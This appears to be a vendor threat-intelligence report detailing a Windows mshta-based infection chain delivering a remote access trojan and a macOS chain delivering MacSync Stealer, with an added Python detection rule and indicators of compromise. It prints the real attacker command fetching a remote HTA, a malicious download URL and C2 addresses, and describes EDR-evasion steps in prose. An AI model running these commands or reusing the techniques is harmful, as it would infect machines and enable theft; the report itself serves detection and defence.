This is the full technical companion to our campaign overview published in Part 1. It documents the Windows and macOS malware chains in detail, and provides the complete indicator of compromise list for threat hunting and detection rule development.
The Windows infection chain is initiated by a single terminal command:
C:\Windows\SysWOW64\mshta.exe https://kimi.install-files.com/kimi
This invokes mshta.exe — a legitimate Windows system binary for executing HTML Application (.hta) files with local system-level privileges. Because it is a trusted Windows component, it bypasses most application allowlisting controls. Here it is used to remotely load a malicious HTA file from attacker-controlled infrastructure.
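The launch pattern above (mshta.exe handed a remote URL) is a reliable hunting signal regardless of the URL involved. The following detection is an added example written for this companion, not code from ThreatBook or the analysed samples; it assumes Sysmon-style process-creation events serialised as JSON lines with Image, CommandLine, ParentImage and Computer fields, and the log lines it scans are constructed, with only the first URL taken from the campaign above.

```python
import json
import re
from urllib.parse import urlparse

# Match mshta.exe under either System32 or SysWOW64, case-insensitively.
MSHTA_RE = re.compile(r"(^|[\\/])mshta\.exe$", re.IGNORECASE)
# Remote sources mshta can load: http(s) URLs and UNC paths.
REMOTE_RE = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)

def tokenize(cmdline):
    """Split a Windows command line, honouring double quotes and dropping them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def analyze_event(event):
    """Return a finding for an mshta launch with a remote argument, else None."""
    if not MSHTA_RE.search(event.get("Image", "")):
        return None
    args = tokenize(event.get("CommandLine", ""))[1:]  # drop argv[0]
    remote = [a for a in args if REMOTE_RE.match(a)]
    if not remote:
        return None
    return {
        "computer": event.get("Computer"),
        "parent": event.get("ParentImage"),
        "remote_sources": remote,
        # For UNC paths urlparse yields no hostname, so fall back to the raw token.
        "hosts": [urlparse(a).hostname or a for a in remote],
    }

def scan(lines):
    """Scan JSON log lines; malformed lines are skipped rather than aborting the hunt."""
    findings = []
    for line in lines:
        try:
            finding = analyze_event(json.loads(line))
        except json.JSONDecodeError:
            continue
        if finding:
            findings.append(finding)
    return findings

# Constructed sample events (hypothetical hosts and parents; first URL is from the report).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"C:\Windows\SysWOW64\mshta.exe https://kimi.install-files.com/kimi"},
    {"Computer": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\App\help.hta"'},
    {"Computer": "WS03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"Computer": "WS04", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\MSHTA.EXE",
     "CommandLine": r'"C:\Windows\System32\MSHTA.EXE" "http://example.invalid/a.hta"'},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]
```

Running `scan(SAMPLE_LOG)` flags the first and fourth events; the local .hta launch in the second event is left alone, so the rule keys on remote loading rather than on mshta.exe itself.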
Obfuscation Layer
The HTA file defines AutoOpen as its entry point — but the entry point is defined ten times. Under standard programming conventions, only the final definition is effective; however, each of the ten definitions references different variables, different hex decoding functions, and different Base64 decoding functions. All implement the same underlying deserialization-and-execute logic. The repetition is not redundancy — it is deliberate obfuscation designed to exhaust static analysis and defeat pattern-matching detection.
.NET Deserialization Chain
The final AutoOpen definition invokes a function that uses hex decoding to decrypt a string, creates a WScript.Shell object via CreateObject, and retrieves the process environment. It then constructs an inline XML manifest in memory, registers a .NET type, and uses CreateObject with an activation context to instantiate a BinaryFormatter — entirely in memory, without triggering a .NET installation interface.
Two payloads are deserialized from embedded Base64-encoded data. The first (approximately 2,225 bytes) disables ActivitySurrogateSelector type-checking — a .NET security control that restricts untrusted objects from participating in deserialization — via an embedded XAML directive. This is a necessary prerequisite for the second payload. The second payload (approximately 170,000 bytes) uses System.Windows.Forms.AxHost+State as an outer wrapper, loading a .NET module named Share (compiled February 25, 2026) into memory.
Shellcode and Final Payload
Share extracts and decrypts data from an embedded resource section, producing a second .NET module, Ethics. Ethics decrypts two architecture-specific shellcode payloads from its own resource section, selects the appropriate one, writes it to a memory region, marks it executable via VirtualProtect, and invokes it through .NET's delegate mechanism.
The shellcode is itself a loader. Its entry instruction jumps past 102,628 bytes of encrypted data to a decryption stub at the payload's end, which decrypts and executes the final stage.
The final payload is a remote access trojan compiled February 25, 2026. Its import table has been deliberately stripped; it uses direct NT syscalls internally to bypass EDR products that rely on userland API hook interception. Upon execution it connects to C2 at 144.124.235.102:443.
The macOS chain begins with a single Base64-encoded terminal command that decodes to a download URL:
http://jaxfamilylawyers.com/curl/515b7a4ebc1a925a99df8abd6ae508ffa971c9d97d6d595fa3f3cd6ee410d78d
The downloaded file is itself encoded; decoding produces a shell script. The shell script downloads and executes an AppleScript payload from the attacker's server. The payload identifies itself internally as MacSync Stealer v1.1.2 (release build).
Execution Sequence
Sample indicators of compromise (each IOC links to ThreatBook Investigator, where full details can be viewed):
144.124.235.102:443
45.94.47.204:80
Detection and protection for this campaign are in place across ThreatBook products. Organizations that identify any of the above IOCs in their environment should treat affected hosts as compromised and initiate incident response procedures immediately.
Contact ThreatBook to learn more about how we can help you in AI application threat detection.